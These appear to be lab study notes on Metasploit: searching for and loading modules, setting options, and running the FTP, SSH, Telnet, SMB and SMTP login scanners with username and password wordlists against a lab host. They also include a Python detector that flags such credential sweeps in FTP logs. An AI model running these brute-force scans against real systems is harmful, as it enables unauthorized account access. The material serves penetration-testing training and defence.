Documents exploit module use, payload configuration, and validation of successful compromise. Reflects practical offensive testing ability.
Metasploit is launched from the terminal using:
```bash
msfconsole
```
---
## 1. Key Metasploit Commands
### Help Menu
Displays core commands and module usage:
```bash
help
```
### Search
Finds modules by name, platform, service, or type:
```bash
search name:apple type:exploit
```
### Module Information
Shows details about a module, including description, platform, targets, required options, and references:
```bash
info exploit/apple_ios/browser/safari_libtiff
```
Metasploit supports full tab completion for all module paths and commands.
---
## 2. Exploit and Auxiliary Module Structure
Modules are organized in a directory hierarchy such as:
```
exploit/<platform>/<service>/<module>
auxiliary/<scanner>/<protocol>/<module>
```
Exploits are ranked by reliability:
* excellent
* great
* good
* normal
* average
Higher-ranked modules are typically more stable and predictable.
---
## 3. Using Modules
### Load a Module
```bash
use <path/to/module>
```
Example:
```bash
use auxiliary/scanner/ftp/ftp_login
```
### Display Module Options
```bash
show options
```
Options marked as **required** must be set before running the module.
### Set Module Options
```bash
set <OPTION> <value>
```
Example:
```bash
set RHOSTS 10.1.16.9
set USER_FILE /media/cdrom0/Lab14/top13-bad-usernames.txt
set PASS_FILE /media/cdrom0/Lab14/top13-bad-passwords.txt
```
USER_FILE and PASS_FILE contain one username or password per line.
USERPASS_FILE can be used for paired credentials in `user:password` format.
### Run the Module
```bash
run
```
After execution, Metasploit reports:
* successful logins
* connection failures
* authentication attempts
---
## 4. Example: FTP Login Scanner
Load the module:
```bash
use auxiliary/scanner/ftp/ftp_login
```
Set required options:
```bash
set RHOSTS 10.1.16.9
set USER_FILE /path/to/usernames.txt
set PASS_FILE /path/to/passwords.txt
```
Verify configuration:
```bash
show options
```
Execute the scan:
```bash
run
```
This module attempts to authenticate to the target FTP service using supplied credentials and outputs any valid username/password pairs.
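From the defender's side, the credential sweep described above leaves a recognizable pattern in the FTP server's log: many failures across several accounts from one source, sometimes followed by a success. The added example below (not part of the original notes) flags that pattern. It assumes vsftpd-style log lines; the sample log, source addresses, thresholds and function names are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in vsftpd log style (assumption: the notes do not name the
# FTP daemon). 10.1.16.50 sweeps several accounts; 10.1.16.20 is a user's typo.
SAMPLE_LOG = """\
Mon Mar  4 10:15:01 2024 [pid 2301] [admin] FAIL LOGIN: Client "10.1.16.50"
Mon Mar  4 10:15:01 2024 [pid 2302] [root] FAIL LOGIN: Client "10.1.16.50"
Mon Mar  4 10:15:02 2024 [pid 2303] [ftp] FAIL LOGIN: Client "10.1.16.50"
Mon Mar  4 10:15:02 2024 [pid 2304] [alice] FAIL LOGIN: Client "10.1.16.20"
Mon Mar  4 10:15:03 2024 [pid 2305] [test] FAIL LOGIN: Client "10.1.16.50"
Mon Mar  4 10:15:03 2024 [pid 2306] [backup] FAIL LOGIN: Client "10.1.16.50"
Mon Mar  4 10:15:04 2024 [pid 2307] [backup] OK LOGIN: Client "10.1.16.50"
Mon Mar  4 10:15:09 2024 [pid 2308] [alice] OK LOGIN: Client "10.1.16.20"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} [ \d]\d \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"')

def parse(log):
    """Yield (timestamp, source_ip, username, succeeded) per login line."""
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y")
            yield ts, m["ip"], m["user"], m["result"] == "OK"

def detect(log, max_fails=5, min_users=3, window=timedelta(minutes=1)):
    """Flag sources with >= max_fails failures over >= min_users accounts inside
    `window`; list accounts that then log in from a flagged source (rotate them)."""
    fails = defaultdict(list)  # ip -> [(ts, user)] failures still inside window
    alerts = {}                # ip -> {"users": set, "compromised": list}
    for ts, ip, user, ok in sorted(parse(log)):
        if ok:
            if ip in alerts:
                alerts[ip]["compromised"].append(user)
            continue
        fails[ip] = [(t, u) for t, u in fails[ip] if ts - t <= window]
        fails[ip].append((ts, user))
        users = {u for _, u in fails[ip]}
        if len(fails[ip]) >= max_fails and len(users) >= min_users:
            entry = alerts.setdefault(ip, {"users": set(), "compromised": []})
            entry["users"] |= users
    return alerts

if __name__ == "__main__":
    print(detect(SAMPLE_LOG))
```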
---
## 5. Other Useful Scanners
Metasploit includes additional authentication scanners that operate similarly:
* SSH
```bash
use auxiliary/scanner/ssh/ssh_login
```
* Telnet
```bash
use auxiliary/scanner/telnet/telnet_login
```
* SMB
```bash
use auxiliary/scanner/smb/smb_login
```
* SMTP
```bash
use auxiliary/scanner/smtp/smtp_enum
```
Each scanner requires setting:
* RHOSTS
* USER_FILE and PASS_FILE (or USERPASS_FILE)
* any protocol-specific fields shown in `show options`
---
## Metasploit Workflow
1. Launch msfconsole
2. Search for modules
3. Load a module with `use`
4. Set required options
5. Run the module
6. Review results